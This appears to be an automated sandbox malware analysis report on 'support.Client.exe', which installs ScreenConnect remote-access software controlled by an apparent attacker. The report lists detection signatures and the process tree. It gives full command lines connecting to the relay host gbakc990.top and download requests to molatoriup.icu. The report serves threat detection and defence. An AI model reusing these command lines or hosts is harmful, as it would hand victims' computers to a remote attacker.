Edit tour

Windows Analysis Report
support.Client.exe

Overview

General Information

Sample name:	support.Client.exe
Analysis ID:	1526279
MD5:	7989214071f7728a9a0d54c29d62d88d
SHA1:	1a2bb3baa708bb8f895adcf5538d166f754a2913
SHA256:	0ff7d27cd6b6a2822b73878995902d9bfa2fe3db623547a9c1ec40e11bda284e
Infos:

Detection

ScreenConnect Tool

Score:	54
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Suricata IDS alerts for network traffic

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Enables network access during safeboot for specific services

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect virtual machines (SGDT)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

support.Client.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\support.Client.exe" MD5: 7989214071F7728A9A0D54C29D62D88D)

dfsvc.exe (PID: 7120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.ClientService.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

WerFault.exe (PID: 6472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 692 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 2364 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

ScreenConnect.WindowsClient.exe (PID: 4312 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe" "RunRole" "b56709e0-433a-4670-b1b3-7d84b1644fec" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)

svchost.exe (PID: 5928 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 4340 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000001.00000002.3548401601.000001AC35347000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 7120	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 2044	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 4904	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.ScreenConnect.WindowsClient.exe.c30000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7120, Protocol: tcp, SourceIp: 31.42.187.211, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1704, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-05T01:03:10.125267+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49742	TCP
2024-10-05T01:03:11.477025+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49744	TCP
2024-10-05T01:03:16.020355+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49750	TCP
2024-10-05T01:03:17.484003+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49751	TCP
2024-10-05T01:03:19.073804+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49752	TCP
2024-10-05T01:03:20.339560+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49753	TCP
2024-10-05T01:03:23.023404+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49754	TCP
2024-10-05T01:03:24.868329+0200	2009897	1	A Network Trojan was detected	31.42.187.211	443	192.168.2.4	49755	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.3% probability

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_00AD1000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Uses 32bit PE files

Source: support.Client.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: support.Client.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 31.42.187.211:443 -> 192.168.2.4:49731 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: support.Client.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35642000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3526A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985211028.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: support.Client.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35266000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1982303877.00000000010C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3547347231.00000000021A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.3547651493.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1977772120.0000000000A9D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35262000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1988194616.000000001BEC2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3563A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35262000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1988194616.000000001BEC2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35642000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3526A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985211028.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3548401601.000001AC350B8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.1983243347.0000000004D32000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 31.42.187.211:443 -> 192.168.2.4:49754

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Jump to behavior

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49756 -> 31.42.187.210:8880

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: YURTEH-ASUA YURTEH-ASUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriup.icuAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: molatoriup.icu
Source: global traffic	DNS traffic detected: DNS query: gbakc990.top

Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
